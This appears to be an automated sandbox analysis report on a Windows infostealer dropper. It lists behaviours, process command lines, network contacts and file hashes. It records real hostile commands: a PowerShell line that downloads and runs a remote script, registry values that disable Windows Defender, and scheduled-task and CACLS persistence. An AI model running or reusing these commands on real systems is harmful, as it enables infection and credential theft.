Analysis Overview
SHA256
fb805377f70ff7b51f71c775cabda6fd28576b9f3fdd2d9abca22b91a125b931
Threat Level: Known bad
The file fb805377f70ff7b51f71c775cabda6fd28576b9f3fdd2d9abca22b91a125b931 was found to be: Known bad.
Malicious Activity Summary
RedLine
Modifies Windows Defender Real-time Protection settings
Aurora
Amadey
RedLine payload
Rhadamanthys
Detect rhadamanthys stealer shellcode
Downloads MZ/PE file
Blocklisted process makes network request
Loads dropped DLL
Checks computer location settings
Reads user/profile data of web browsers
Windows security modification
Executes dropped EXE
Adds Run key to start application
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Creates scheduled task(s)
Runs ping.exe
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-03-21 15:09
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-03-21 15:09
Reported
2023-03-21 15:12
Platform
win10v2004-20230221-en
Max time kernel
150s
Max time network
152s
Command Line
Signatures
Amadey
Aurora
Detect rhadamanthys stealer shellcode
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v8031ED.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v8031ED.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v8031ED.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz1203.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz1203.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz1203.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v8031ED.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v8031ED.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz1203.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz1203.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz1203.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v8031ED.exe | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Rhadamanthys
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000115001\sqlcmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y67rZ35.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zap5891.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zap0848.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zap0004.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz1203.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v8031ED.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w13dW92.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xkivC10.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y67rZ35.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000115001\sqlcmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000116001\serv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000118001\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz1203.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v8031ED.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v8031ED.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\fb805377f70ff7b51f71c775cabda6fd28576b9f3fdd2d9abca22b91a125b931.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\fb805377f70ff7b51f71c775cabda6fd28576b9f3fdd2d9abca22b91a125b931.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zap5891.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zap5891.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zap0848.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zap0848.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zap0004.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zap0004.exe | N/A |
Checks installed software on the system
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000116001\serv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000116001\serv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000116001\serv.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v8031ED.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w13dW92.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\1000116001\serv.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | C:\Users\Admin\AppData\Local\Temp\1000116001\serv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | C:\Users\Admin\AppData\Local\Temp\1000116001\serv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\1000116001\serv.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\1000116001\serv.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\1000116001\serv.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz1203.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz1203.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v8031ED.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v8031ED.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w13dW92.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w13dW92.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xkivC10.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xkivC10.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz1203.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v8031ED.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w13dW92.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xkivC10.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1000116001\serv.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1000116001\serv.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\fb805377f70ff7b51f71c775cabda6fd28576b9f3fdd2d9abca22b91a125b931.exe
"C:\Users\Admin\AppData\Local\Temp\fb805377f70ff7b51f71c775cabda6fd28576b9f3fdd2d9abca22b91a125b931.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zap5891.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zap5891.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zap0848.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zap0848.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zap0004.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zap0004.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz1203.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz1203.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v8031ED.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v8031ED.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 3228 -ip 3228
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3228 -s 1040
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w13dW92.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w13dW92.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2552 -ip 2552
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2552 -s 1356
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xkivC10.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xkivC10.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y67rZ35.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y67rZ35.exe
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
"C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN legenda.exe /TR "C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "legenda.exe" /P "Admin:N"&&CACLS "legenda.exe" /P "Admin:R" /E&&echo Y|CACLS "..\f22b669919" /P "Admin:N"&&CACLS "..\f22b669919" /P "Admin:R" /E&&Exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "legenda.exe" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "legenda.exe" /P "Admin:R" /E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\f22b669919" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\f22b669919" /P "Admin:R" /E
C:\Users\Admin\AppData\Local\Temp\1000115001\sqlcmd.exe
"C:\Users\Admin\AppData\Local\Temp\1000115001\sqlcmd.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\1000115001\sqlcmd.exe" >> NUL
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
C:\Users\Admin\AppData\Local\Temp\1000116001\serv.exe
"C:\Users\Admin\AppData\Local\Temp\1000116001\serv.exe"
C:\Users\Admin\AppData\Local\Temp\1000118001\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\1000118001\svchost.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2796 -ip 2796
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2796 -s 684
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic os get Caption
C:\Windows\SysWOW64\cmd.exe
cmd /C "wmic path win32_VideoController get name"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\SysWOW64\cmd.exe
cmd /C "wmic cpu get name"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic cpu get name
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 32.146.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.81.184.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.150.43.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.192.144.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.122.125.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.113.223.173.in-addr.arpa | udp |
| DE | 193.233.20.30:4125 | tcp | |
| US | 8.8.8.8:53 | 30.20.233.193.in-addr.arpa | udp |
| US | 20.189.173.6:443 | tcp | |
| US | 8.8.8.8:53 | 202.74.101.95.in-addr.arpa | udp |
| DE | 193.233.20.30:4125 | tcp | |
| DE | 162.19.139.184:2222 | tcp | |
| RU | 62.204.41.87:80 | 62.204.41.87 | tcp |
| US | 8.8.8.8:53 | www.mdegmm.com | udp |
| US | 162.248.50.116:443 | www.mdegmm.com | tcp |
| US | 8.8.8.8:53 | 87.41.204.62.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 116.50.248.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 188.155.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ebfertility.com | udp |
| US | 89.190.157.61:80 | ebfertility.com | tcp |
| US | 162.248.50.116:443 | www.mdegmm.com | tcp |
| US | 8.8.8.8:53 | 61.157.190.89.in-addr.arpa | udp |
| US | 162.248.50.116:443 | www.mdegmm.com | tcp |
| LV | 195.123.211.54:80 | 195.123.211.54 | tcp |
| US | 8.8.8.8:53 | 54.211.123.195.in-addr.arpa | udp |
| NL | 185.246.221.126:80 | 185.246.221.126 | tcp |
| US | 8.8.8.8:53 | 126.221.246.185.in-addr.arpa | udp |
| NL | 212.87.204.93:8081 | tcp | |
| US | 8.8.8.8:53 | 93.204.87.212.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.13.109.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zap5891.exe
| MD5 | fc26c666dd920ef5f62a921809bfdb3f |
| SHA1 | 05f344ecbbf3bfe10506c0ae0cf470e04b38a130 |
| SHA256 | 6ddd5f9b7ff79cf077c3170ec346cc7b375fadeec0bbca25d9a953ba1ee433d0 |
| SHA512 | b6311d9f3f4f7f56c0f67ffaa63d61bee13d2aacf8d59001d4cb7c24dfba616b3b5e243cb903277889633bbe9916d98a8bf7713f926bb2be7ea44868029ce8d7 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zap5891.exe
| MD5 | fc26c666dd920ef5f62a921809bfdb3f |
| SHA1 | 05f344ecbbf3bfe10506c0ae0cf470e04b38a130 |
| SHA256 | 6ddd5f9b7ff79cf077c3170ec346cc7b375fadeec0bbca25d9a953ba1ee433d0 |
| SHA512 | b6311d9f3f4f7f56c0f67ffaa63d61bee13d2aacf8d59001d4cb7c24dfba616b3b5e243cb903277889633bbe9916d98a8bf7713f926bb2be7ea44868029ce8d7 |
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zap0848.exe
| MD5 | a8b42d7b4f7e1c00f3cba5e4bda409ec |
| SHA1 | d445a7106437457b60d4ab7686c21ef2b6b89410 |
| SHA256 | 1df60ed3d48851bc6abca9afe70d6e8590d5cf2631faa6d6d0bc47cae015b42a |
| SHA512 | c3a2dd272660ea9e674f2eec3d1668ca32970872dc51e281b860dfab368e14b97689bd80d7c81e4b75a33bb0d3a6bcd7c158d132841b595ee3510f9eab7fca39 |
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zap0848.exe
| MD5 | a8b42d7b4f7e1c00f3cba5e4bda409ec |
| SHA1 | d445a7106437457b60d4ab7686c21ef2b6b89410 |
